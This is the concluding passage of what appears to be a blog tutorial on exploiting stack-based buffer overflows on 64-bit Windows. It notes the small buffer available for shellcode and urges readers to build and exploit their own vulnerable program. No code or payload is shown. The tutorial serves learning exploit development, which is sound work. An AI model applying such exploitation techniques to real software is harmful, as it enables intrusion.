However, please note that we have a small buffer and it might be difficult to find a good shellcode to fit in this space. However, the purpose of the article was to find some way to exploit this vulnerability in a way that can be easily understood.
Conclusion
Maybe this article did not cover a real-life situation, but it should be enough as a starting point in exploiting Stack Based Buffer Overflows on Windows 64 bits.
My recommendation is to compile yourself a program like this one and try to exploit it yourself. You can download my simple Visual Studio 2017 project from here.
If you have any questions, please leave a comment here and use the contact email.